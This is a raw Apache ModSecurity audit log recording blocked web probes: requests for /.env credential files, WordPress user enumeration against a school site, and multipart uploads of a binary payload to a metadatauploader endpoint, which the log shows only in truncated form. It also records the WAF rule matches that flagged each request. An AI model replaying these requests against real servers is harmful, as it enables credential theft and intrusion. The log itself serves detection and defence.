p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edcdaa61-Z-- --58342d6f-A-- [30/May/2025:09:56:08 +0700] aDkeSJxu2QkuXt3B9jaSGQAAAJU 103.236.140.4 55882 103.236.140.4 8181 --58342d6f-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --58342d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58342d6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768977078 683 (- - -) Stopwatch2: 1748573768977078 683; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58342d6f-Z-- --8e102414-A-- [30/May/2025:09:56:09 +0700] aDkeSRNBDSvkc-tIZOnfTgAAAFM 103.236.140.4 55884 103.236.140.4 8181 --8e102414-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8e102414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e102414-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769317984 662 (- - -) Stopwatch2: 1748573769317984 662; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e102414-Z-- --7b83c75e-A-- [30/May/2025:09:56:09 +0700] aDkeSZxu2QkuXt3B9jaSGgAAAJM 103.236.140.4 55886 103.236.140.4 8181 --7b83c75e-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7b83c75e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b83c75e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769558647 638 (- - -) Stopwatch2: 1748573769558647 638; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b83c75e-Z-- --bf99db2f-A-- [30/May/2025:09:56:09 +0700] aDkeSbW504ObxUT6Rrz0xgAAAAI 103.236.140.4 55888 103.236.140.4 8181 --bf99db2f-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --bf99db2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf99db2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769900295 669 (- - -) Stopwatch2: 1748573769900295 669; combined=257, p1=226, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf99db2f-Z-- --498af213-A-- [30/May/2025:09:56:10 +0700] aDkeShNBDSvkc-tIZOnfTwAAAFY 103.236.140.4 55890 103.236.140.4 8181 --498af213-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --498af213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --498af213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770140984 673 (- - -) Stopwatch2: 1748573770140984 673; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498af213-Z-- --1a02c004-A-- [30/May/2025:09:56:10 +0700] aDkeSoWl_OZMPH_FZ2DMXgAAAMQ 103.236.140.4 55892 103.236.140.4 8181 --1a02c004-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1a02c004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a02c004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770482499 782 (- - -) Stopwatch2: 1748573770482499 782; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a02c004-Z-- --f756d13e-A-- [30/May/2025:09:56:10 +0700] aDkeSoWl_OZMPH_FZ2DMXwAAAMk 103.236.140.4 55894 103.236.140.4 8181 --f756d13e-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f756d13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f756d13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770724114 717 (- - -) Stopwatch2: 1748573770724114 717; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f756d13e-Z-- --e6267828-A-- [30/May/2025:10:35:38 +0700] aDknipxu2QkuXt3B9jaSMQAAAJQ 103.236.140.4 56144 103.236.140.4 8181 --e6267828-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.75.94.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.75.94.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6267828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6267828-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748576138985793 1969 (- - -) Stopwatch2: 1748576138985793 1969; combined=962, p1=323, p2=613, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6267828-Z-- --1ead9b14-A-- [30/May/2025:10:45:42 +0700] aDkp5oWl_OZMPH_FZ2DMjAAAAMI 103.236.140.4 56250 103.236.140.4 8181 --1ead9b14-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ead9b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ead9b14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748576742856018 849 (- - -) Stopwatch2: 1748576742856018 849; combined=352, p1=304, p2=0, p3=0, p4=0, p5=47, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ead9b14-Z-- --eda7b30f-A-- [30/May/2025:10:50:46 +0700] aDkrFoWl_OZMPH_FZ2DMmgAAANQ 103.236.140.4 56304 103.236.140.4 8181 --eda7b30f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --eda7b30f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eda7b30f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748577046895809 734 (- - -) Stopwatch2: 1748577046895809 734; combined=295, p1=242, p2=0, p3=0, p4=0, p5=53, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eda7b30f-Z-- --e1b5e219-A-- [30/May/2025:10:51:42 +0700] aDkrTpxu2QkuXt3B9jaSPwAAAJE 103.236.140.4 56314 103.236.140.4 8181 --e1b5e219-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.132.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.132.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e1b5e219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1b5e219-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577102986208 2428 (- - -) Stopwatch2: 1748577102986208 2428; combined=1082, p1=373, p2=681, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1b5e219-Z-- --eb29d65b-A-- [30/May/2025:10:53:47 +0700] aDkry4Wl_OZMPH_FZ2DMwQAAAM8 103.236.140.4 56444 103.236.140.4 8181 --eb29d65b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.206.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.206.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb29d65b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb29d65b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577227049012 2429 (- - -) Stopwatch2: 1748577227049012 2429; combined=1156, p1=403, p2=725, p3=0, p4=0, p5=27, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb29d65b-Z-- --04de5821-A-- [30/May/2025:11:05:00 +0700] aDkubBNBDSvkc-tIZOnfcwAAAEk 103.236.140.4 56516 103.236.140.4 8181 --04de5821-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.53.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.53.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04de5821-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04de5821-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577900080602 3283 (- - -) Stopwatch2: 1748577900080602 3283; combined=1430, p1=480, p2=917, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04de5821-Z-- --56321346-A-- [30/May/2025:11:14:22 +0700] aDkwnoWl_OZMPH_FZ2DMygAAAMU 103.236.140.4 56568 103.236.140.4 8181 --56321346-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.243.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.243.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56321346-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56321346-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748578462587196 2461 (- - -) Stopwatch2: 1748578462587196 2461; combined=1135, p1=389, p2=717, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56321346-Z-- --ff951d51-A-- [30/May/2025:12:04:06 +0700] aDk8RoWl_OZMPH_FZ2DRWAAAAMc 103.236.140.4 38238 103.236.140.4 8181 --ff951d51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.163.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.225.163.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff951d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff951d51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748581446437433 2823 (- - -) Stopwatch2: 1748581446437433 2823; combined=1273, p1=413, p2=831, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff951d51-Z-- --cc475229-A-- [30/May/2025:12:09:45 +0700] aDk9mZxu2QkuXt3B9jaYTwAAAIU 103.236.140.4 39604 103.236.140.4 8181 --cc475229-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: http Connection: close Content-Length: 516 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24 Content-Type: multipart/form-data --cc475229-C-- PK .propertiesœÑÍjAà“ù!üÉHî\d™îÀÈÈüCéhˆ îâuºfªÛš®Ê­ÛZÉÂÇÂ\‰/ [×Ùú‚ÒcÃèN<«Spø ¸ï¿£ë— zEq%¹‰Ø:Å’+?\ÿrê·Þµ°”"ÊÔ„*#^°‘Öë¤^'‹õN`ôÌ}òZè…Q½6¯>8ûÐFk«ÆR¶Gc±<ŠhV^[“wûê´_GºZ‚óŽm¡Æ²U’T¬<ãÒßþ>¹îò·OŸ7žý'}m®_°äks¬T?=Lßn^\ùqÆm,iòúžÍÔgYR¬P%Úr.'‚õßß7TN“ÇÂy9ÝIÑ™äFã ¢m½4=rlÅŽ­iÞmV“y îgÁ€þHœmû‚¯éáôåq?+«bX ¶O©_ÊI¿*˜e[òÏ”5µ*èhç‚àf]n$ÉÿApn÷ÙÁ£Ã'[ïîï zÞÎÔQs†£’f*„à~ÿÿPK57Ùuz4PK57Ùuz4 .propertiesPK9³ --cc475229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc475229-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748581785133233 2667 (- - -) Stopwatch2: 1748581785133233 2667; combined=1522, p1=458, p2=1033, p3=0, p4=0, p5=31, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc475229-Z-- --af763a06-A-- [30/May/2025:12:10:17 +0700] aDk9ubW504ObxUT6Rrz7VQAAAAA 103.236.140.4 39752 103.236.140.4 8181 --af763a06-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: https Connection: close Content-Length: 517 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15 Content-Type: multipart/form-data --af763a06-C-- PK .propertiesœÑÍjAà“ù!üÉHî\d™îed þ! Žt4Dwñ:]ÓÕ=5]•[·MÅ…!>„ ¸_@·®³õ ¥ÇèN<«Spø 